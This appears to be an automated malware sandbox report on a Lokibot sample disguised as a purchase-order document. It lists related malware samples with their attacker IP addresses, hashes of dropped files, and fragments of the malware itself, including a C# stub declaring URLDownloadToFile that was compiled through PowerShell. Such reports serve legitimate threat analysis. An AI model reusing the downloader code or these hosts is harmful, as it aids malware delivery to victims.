                                                                                                                          Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 72.11.156.80
                                                                                                                          .main.elfGet hashmaliciousXmrigBrowse
                                                                                                                          • 66.63.187.200
                                                                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 104.223.82.201
                                                                                                                          Trykblgens.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          • 172.93.187.72
                                                                                                                          NET1-ASBGPO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.41
                                                                                                                          ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.41
                                                                                                                          greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.41
                                                                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.41
                                                                                                                          WjcXwIcclB.exeGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.41
                                                                                                                          0aA7F59xDl.exeGet hashmaliciousLokibotBrowse
                                                                                                                          • 94.156.177.95
                                                                                                                          givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.95
                                                                                                                          seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.95
                                                                                                                          seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.95
                                                                                                                          PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                          • 94.156.177.95
                                                                                                                          No context
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exePO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                            C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310720
                                                                                                                              Entropy (8bit):1.3073687405597056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr2:KooCEYhgYEL0In
                                                                                                                              MD5:514562121CE91D244DAC62301A43988D
                                                                                                                              SHA1:B26CFEAF9C90959E13372FF3310B5852CFABB84B
                                                                                                                              SHA-256:CD623FF5943AADDE425A4EEF4565EF78FABBF4C698025A67B101FA75A9C9E1DD
                                                                                                                              SHA-512:C71C45AB8E6575286BA682536959AAE5D1078449B1C5E88E7405F9ED08AE55D9F5235D2D25CFF5048AB2413CEC82007FCB104B06158984AB2B642A681823F36A
                                                                                                                              Malicious:false
                                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfd6a5456, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1310720
                                                                                                                              Entropy (8bit):0.4221441499599696
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:vPBSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1w:vPBaza/vMUM2Uvz7DO
                                                                                                                              MD5:5BA4311732CC5D947E88C513D6079D70
                                                                                                                              SHA1:80DCD7B383109788DD745F599112A9E44B492833
                                                                                                                              SHA-256:C4CA13CECEDAFFECF89E4F0DF3DA3EF5D16E864BBFD39480FE7D359D37BB02A7
                                                                                                                              SHA-512:C98C155AA32BE7C328204F57471864E1C2F28F52C6BF7059BBB35C223580B9EFDAFAEEFE915D2AFF536812BDBD06AD3DAB30479A1083D7555BF7E15120D5FA60
                                                                                                                              Malicious:false
                                                                                                                              Preview:.jTV... .......A.......X\...;...{......................0.!..........{A..9...|k.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................._.9...|..................UDp..9...|k..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16384
                                                                                                                              Entropy (8bit):0.07704479230918414
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ktmUYeaaOravjn13a/wc7wr/tallcVO/lnlZMxZNQl:kTzaav53qwQOewk
                                                                                                                              MD5:DD2C4F2B32CC57C7BF08E3E293E9A099
                                                                                                                              SHA1:4C28028F8DB6CBF03B03917667EC7E7825418C5E
                                                                                                                              SHA-256:B8ED1696596E6CEDB258FB989CCE562EECD2A2DFF2A7B70782A269ED96D775CD
                                                                                                                              SHA-512:BACD12C9742FCC0D958AEE1A8481ACEDFDE9563CE8130A7A98F6568C45AFD40F7205AC8EB14320C23D0E48979DF2A079F3892594249019C43D50466FB9932261
                                                                                                                              Malicious:false
                                                                                                                              Preview:f........................................;...{...9...|k......{A..............{A......{A..........{A]................UDp..9...|k.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600576
                                                                                                                              Entropy (8bit):7.913749036393697
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                                                                                              MD5:66B03D1AFF27D81E62B53FC108806211
                                                                                                                              SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                                                                                              SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                                                                                              SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: PO-000041492.docx.doc, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.363925654197743
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:RWSU4xympx4RfoUP7gZ9tK8NPZHUx7u1iMuge//ZeUyus:RLHxv/IwLZ2KRH6Ougos
                                                                                                                              MD5:949556887D629CBD6C22A0DE56F97F73
                                                                                                                              SHA1:62AC2F2D46563A5FE7B7BFA901FB2BD479565704
                                                                                                                              SHA-256:1C95FB9EEE8F76C6733C027FFF0C7B2DE96D7DAD438F0F88386DD612CE55E5F3
                                                                                                                              SHA-512:C579E74EA7A5E59ED8C9F701CDC7B8B035BE8CCB7ABDCA156C2FFD302D4EFBD67FE9F6CD5AD9087BEDDB3C88099FE1C45B50373A18C10C50C3FBDA1BC34F6116
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e...........................................................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 11:40:57 2024, 1st section name ".debug$S"
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1328
                                                                                                                              Entropy (8bit):3.970383133135919
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:HQge9E2+ftXDfHFWwKEbsmfII+ycuZhNjakSFPNnqSqd:wetzl1KPmg1ulja3fqSK
                                                                                                                              MD5:98AE4D83954C39A21E157DEE2ED94A34
                                                                                                                              SHA1:B7E335F734A93093969261A4437E76C179EE28FE
                                                                                                                              SHA-256:D503B9AF96D587C59E53FF836A81BED3B754A53F280F223A688E1CDB7CB2AEB7
                                                                                                                              SHA-512:39A8D5CCAB3E4273BB41D7977FC84F3DD2AC7FC0AB9A53143DAE9CB195B5F222DC69CC4D271A019527CC834FAEAF96E9DD9965A7D0D102C4CA1BE33F7BD53882
                                                                                                                              Malicious:false
                                                                                                                              Preview:L.....=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP...............54{.k..:..)...Xb..........4.......C:\Users\user\AppData\Local\Temp\RESBF21.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.g.2.b.c.r.b.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                              File Type:MSVC .res
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):652
                                                                                                                              Entropy (8bit):3.0931339061474246
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                                                                                                                              MD5:35347BAD6B02083AB0EB29B287FA5862
                                                                                                                              SHA1:BFD7EA84D14D95726788F7EE993F4348789146E9
                                                                                                                              SHA-256:838FF787ED2A11F50AF7A099382F814A522A3DE5DDA21C399088D2C8F9B638A2
                                                                                                                              SHA-512:3CD60B9E1C6D5B12F41C15E036227E1C324FCFB7A7D7D53C013E79F8E987010BE48E122D7C069F243F9C0073B2EF2473008A8E4BABDD97D30397F5A5007B0731
                                                                                                                              Malicious:false
                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.g.2.b.c.r.b.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.g.2.b.c.r.b.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):480
                                                                                                                              Entropy (8bit):3.827531183529261
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:V/DsYLDS81zuwAH0kHMelQXReKJ8SRHy4HjvWbuMC5NjN6qQy:V/DTLDfuwaKXfH/WCpiy
                                                                                                                              MD5:B0517586F4097114E790C61F2685F0D5
                                                                                                                              SHA1:20F7482298AB96731228EBD5242CEDDFD72FF50F
                                                                                                                              SHA-256:A738E3AF6F29EDD637630B0299F306056042EA1C73850EEE95498499F5D90237
                                                                                                                              SHA-512:C28702017CE7FE0D34BEA38CEF48DF3BB65C63D92DDDD6F8264F7262F7AE61B8D71BCD6FEC06D0792373D15BA84FB2A1D0C26B0FE5755BC20505A9197D654BA0
                                                                                                                              Malicious:false
                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace LYPhpfZVh.{. public class PKJmdq. {. [DllImport("uRLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr LODMlIYFHF,string eO,string Lrd,uint kCMv,IntPtr sKwhSUgFd);.. }..}.
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):369
                                                                                                                              Entropy (8bit):5.248645455911399
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f5gvg10zxs7+AEszIwkn23f5gvgEAn:p37Lvkmb6KRfRgvgqWZEifRgvgP
                                                                                                                              MD5:90DEA8D988EE9901587EFDA11E05BAFC
                                                                                                                              SHA1:F7128226C319AB687B7C10F88EF4A89CE80CABD8
                                                                                                                              SHA-256:8C6B440EADC5503A196DD0F0156EEC3E59745E2947370F4636A42724DCB7AF73
                                                                                                                              SHA-512:88A63811F58ACDE1E24543D467D9D70A79F02BE7FD76FC9A67E7D5B373AA5AA86A7ECCF037B516D37A35FFE896CEB96167B136CAA6628E2FA8DA128F63073F7C
                                                                                                                              Malicious:true
                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.0.cs"
                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3072
                                                                                                                              Entropy (8bit):2.84155798620604
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:etGSHPBe5ekrl88NRck5wqujf/UoItkZfVDbCZ0WI+ycuZhNjakSFPNnq:6Qskr+Wkf8o/JVDbCZX1ulja3fq
                                                                                                                              MD5:C4F9F32EDD0A92B9B7F3ACC2D3B40885
                                                                                                                              SHA1:38F96A91340B5E82C12DB87AA57162A7AF28D1E4
                                                                                                                              SHA-256:80F946C064277AC4BEE1ADA29F7F5889E6AAED33EEBB48B0CE906E838B0A818E
                                                                                                                              SHA-512:AF6983330C3D0813D2F412C0E1AD437294705068D7E556A126CB7B094D4E0B3662B040F6FC43E94A94444280EC4E65FBB09D9FC08BBC99381E3FAB977EF53E80
                                                                                                                              Malicious:true
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x.......................................... ?.....P ......Q.........W.....b.....e.....i.....n...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.sg
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
